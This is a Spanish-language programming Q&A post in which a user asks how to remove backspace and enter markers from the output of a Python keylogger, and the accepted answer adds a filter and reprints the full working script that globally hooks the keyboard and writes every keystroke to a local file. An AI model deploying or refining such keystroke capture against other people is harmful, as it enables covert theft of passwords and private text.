# Borrar entrada de un keylogger

Tags: python, python-3.x

estoy jugando con un keylogger, pero no encuentro la manera de borrarle  `[backspace (down)]  [backspace (down)]` o `[enter (down)]  [enter (up)]` 
como podria hacer? estoy estudiandolo pero no encuentro la manera de borrarselo

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#   Copyright 2013-2017 Recursos Python
#   www.recursospython.com
#
from functools import partial
import atexit
import os
import keyboard
MAP = {
    "space": " ",
    "\r": "\n"
}
# Ubicación y nombre del archivo que guarda las teclas presionadas.
FILE_NAME = "keys.txt"
# Determina si el archivo de salida es limpiado cada vez que se
# inicia el programa.
CLEAR_ON_STARTUP = False
# Tecla para terminar el programa o None para no utilizar ninguna tecla.
TERMINATE_KEY = "esc"
def callback(output, is_down, event):
    if event.event_type in ("up", "down"):
        key = MAP.get(event.name, event.name)
        modifier = len(key) > 1
        # Capturar únicamente los modificadores cuando están siendo
        # presionados.
        if not modifier and event.event_type == "down":
            return
        # Evitar escribir múltiples veces la misma tecla si está
        # siendo presionada.
        if modifier:
            if event.event_type == "down":
                if is_down.get(key, False):
                    return
                else:
                    is_down[key] = True
            elif event.event_type == "up":
                is_down[key] = False
            # Indicar si está siendo presionado.
            key = " [{} ({})] ".format(key, event.event_type)
        elif key == "\r":
            # Salto de línea.
            key = "\n"
        # Escribir la tecla al archivo de salida.
        output.write(key)
        # Forzar escritura.
        output.flush()
def onexit(output):
    output.close()
def main():
    # Borrar el archivo previo.
    if CLEAR_ON_STARTUP:
        os.remove(FILE_NAME)

    # Indica si una tecla está siendo presionada.
    is_down = {}

    # Archivo de salida.
    output = open(FILE_NAME, "a")

    # Cerrar el archivo al terminar el programa.
    atexit.register(onexit, output)

    # Instalar el registrador de teclas.
    keyboard.hook(partial(callback, output, is_down))
    keyboard.wait(TERMINATE_KEY)
if __name__ == "__main__":
    main()
```

Answer (score 1, accepted):

Kiyosaki, a tú código, solamente le agregué un par de comentarios, y esta línea:

```
if key not in ["backspace","enter"]:
```

Simplemente valida que la variable **key** (que es la que tiene la tecla capturada), no tenga alguno de los valores especificados, en este caso "backspace" y "enter".

```
from functools import partial
import atexit
import os
import keyboard
MAP = {
    "space": " ",
    "\r": "\n"
}
# Ubicación y nombre del archivo que guarda las teclas presionadas.
FILE_NAME = "keys.txt"
# Determina si el archivo de salida es limpiado cada vez que se
# inicia el programa.
CLEAR_ON_STARTUP = False
# Tecla para terminar el programa o None para no utilizar ninguna tecla.
TERMINATE_KEY = "esc"
def callback(output, is_down, event):
    if event.event_type in ("up", "down"):

        # Esta línea lee el caracter presionado
        key = MAP.get(event.name, event.name)

        # Luego valido que dicho caracter no esté en la lista ["backspace","enter"]
        if key not in ["backspace","enter"]:
          modifier = len(key) > 1
          # Capturar únicamente los modificadores cuando están siendo
          # presionados.
          if not modifier and event.event_type == "down":
              return
          # Evitar escribir múltiples veces la misma tecla si está
          # siendo presionada.
          if modifier:
              if event.event_type == "down":
                  if is_down.get(key, False):
                      return
                  else:
                      is_down[key] = True
              elif event.event_type == "up":
                  is_down[key] = False
              # Indicar si está siendo presionado.
              key = " [{} ({})] ".format(key, event.event_type)
          elif key == "\r":
              # Salto de línea.
              key = "\n"
          # Escribir la tecla al archivo de salida.
          print(key)
          output.write(key)
          # Forzar escritura.
          output.flush()
def onexit(output):
    output.close()
def main():
    # Borrar el archivo previo.
    if CLEAR_ON_STARTUP:
        os.remove(FILE_NAME)

    # Indica si una tecla está siendo presionada.
    is_down = {}

    # Archivo de salida.
    output = open(FILE_NAME, "a")

    # Cerrar el archivo al terminar el programa.
    atexit.register(onexit, output)

    # Instalar el registrador de teclas.
    keyboard.hook(partial(callback, output, is_down))
    keyboard.wait(TERMINATE_KEY)
if __name__ == "__main__":
    main()
```